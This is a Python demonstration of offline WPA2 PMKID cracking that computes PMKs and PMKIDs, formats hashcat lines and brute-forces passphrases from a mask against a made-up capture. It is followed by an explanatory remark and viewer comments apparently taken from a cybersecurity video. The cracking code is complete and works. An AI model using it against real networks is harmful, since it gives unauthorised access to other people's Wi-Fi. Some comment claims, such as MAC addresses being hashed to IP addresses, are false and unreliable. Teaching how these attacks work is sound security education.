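def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def to_hc22000(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """One hashcat -m 22000 line for a PMKID (type 01); the last three
    fields (ANONCE, EAPOL, MESSAGEPAIR) are only used by the handshake type 02."""
    fields = ["WPA", "01", pmkid.hex(), mac_ap.hex(), mac_sta.hex(),
              ssid.encode().hex(), "", "", ""]
    return "*".join(fields)


def expand_mask(mask: str) -> list:
    """Turn a hashcat-style mask into one candidate alphabet per position.
    '?d' digits, '?l' lowercase, '?u' uppercase, '??' a literal '?';
    any other character is a literal."""
    alphabets = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            nxt = mask[i + 1]
            if nxt in CHARSETS:
                alphabets.append(CHARSETS[nxt])
            elif nxt == "?":
                alphabets.append("?")
            else:
                raise ValueError(f"unsupported charset ?{nxt}")
            i += 2
        else:
            alphabets.append(mask[i])
            i += 1
    return alphabets


def keyspace(mask: str) -> int:
    """Number of candidates a mask produces (the figure hashcat prints)."""
    n = 1
    for alphabet in expand_mask(mask):
        n *= len(alphabet)
    return n


def increment_keyspace(mask: str, min_len: int, max_len: int) -> int:
    """Candidates tried by --increment --increment-min/--increment-max:
    the mask truncated to every length from min_len to max_len."""
    alphabets = expand_mask(mask)
    total = 0
    for length in range(min_len, min(max_len, len(alphabets)) + 1):
        n = 1
        for alphabet in alphabets[:length]:
            n *= len(alphabet)
        total += n
    return total


def crack_pmkid(target: bytes, ssid: str, mac_ap: bytes, mac_sta: bytes, mask: str):
    """Derive and compare every candidate the mask generates. The access
    point is never contacted, so a retry delay or lockout on the router
    cannot slow this loop down; only the PBKDF2 cost per guess does."""
    for combo in itertools.product(*expand_mask(mask)):
        candidate = "".join(combo)
        if len(candidate) < 8:  # WPA2 passphrases are 8..63 characters
            continue
        if derive_pmkid(derive_pmk(candidate, ssid), mac_ap, mac_sta) == target:
            return candidate
    return None


# Constructed "capture": made-up SSID and MACs, and an 8-digit passphrase
# that the demo then pretends not to know.
SSID = "demo-ap"
MAC_AP = bytes.fromhex("001122334455")
MAC_STA = bytes.fromhex("66778899aabb")
CAPTURED_PMKID = derive_pmkid(derive_pmk("00000042", SSID), MAC_AP, MAC_STA)

if __name__ == "__main__":
    print(to_hc22000(CAPTURED_PMKID, MAC_AP, MAC_STA, SSID))
    print("8-digit keyspace:", keyspace("?d?d?d?d?d?d?d?d"))
    # Search only the last two digits so the demo finishes in about a second.
    print("recovered:", crack_pmkid(CAPTURED_PMKID, SSID, MAC_AP, MAC_STA, "000000?d?d"))
```

Python's `hashlib.pbkdf2_hmac` manages a few hundred guesses per second on one core; the same loop is what a GPU runs in parallel across thousands of candidates, which is where the video's speeds come from. Note that the 8-digit keyspace is 10^8 regardless of where the real passphrase sits in it; the demo fixes six digits purely to keep the run short.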
Are we getting setup tour anytime soon ? 😁
How did you move the file to your Windows computer, retrieve the file, and how did you get to the terminal on your computer?
As soon as you add uppercase and symbols the time to crack will blow out to a million years
I find this interesting, moreover because the default password on a Sky router was 8 digits made up of upper, lower and numericals; however when I tested this... simple method really, I had my password in front of me after about 8 minutes. Long story short, if someone wants into your Wi-Fi bad enough there's no real stopping it unless you manually set your password to 16+ digits, and most people overlook this as they are convinced that upper/lower/numerical passwords are so strong and secure, until they see how easy a brute force can be!
I am back to your channel after one year. Where can I do testing? Can you suggest me any site?
Would a dual GPU setup make it faster?
David - Thank you! This is such a helpful video. I appreciate all of the content and knowledge you're passing along in cyber security.
I did have a question: how do you set up the Alfa wifi adapter for WSL2 running on Windows 11?
Good luck getting WSL to recognize any USB devices. After some googling, some places say it's possible. Others say it can't. I tried, and have settled on USB devices not passing through to Kali on WSL.
Easy solution: Just use a virtual machine like VMware and install kali on it for network hacking. Use WSL2 Kali for everything else.. which ultimately means having 2 kali machines, which then out of laziness defaults to just using the virtual machine Kali and never touching WSL again.
TLDR: Ditch WSL and stick to a VM to keep it simple.
Is Meraki still requiring subscriptions?
A question: doesn't MAC filtering make it safe enough for you? Or can you still be a victim of sniffers?
To my knowledge, MAC addresses are essentially hashed to IP addresses, so someone with the same IP address as a prohibited MAC address could possibly exploit this. A better way of handling this may be through using data analytics to determine whether a connection involves normal Internet traffic or has malicious intent or something like CloudFlare’s DDoS protection.
Great video!!! What about WPA-E using SSL certificates?
you don't need a monitor that is 7 miles wide
😅
Hey David, which machine and configuration do you use for full-time hacking exercises? What would be good enough?
Did you convert the .cap file into hash using John?
How many enemies do you have if you're scared about people logging into your router. Lmfao.
David, you should do tours brother, I'd love to go and meet ya.
Thank you for this info!
Hello, I have a question. Since even more complex passwords can be cracked, is it worth adding MAC filtering on the router to secure yourself in this way?
The way you teach and reach millions of people you will easily reach the 1mil subs.
Thank you thank you thank you
I love this man's persistence
Good content. Thanks for posting.
I’m hoping to access my ‘Yi iot’ ip camera and redirect video output to my own cloud backup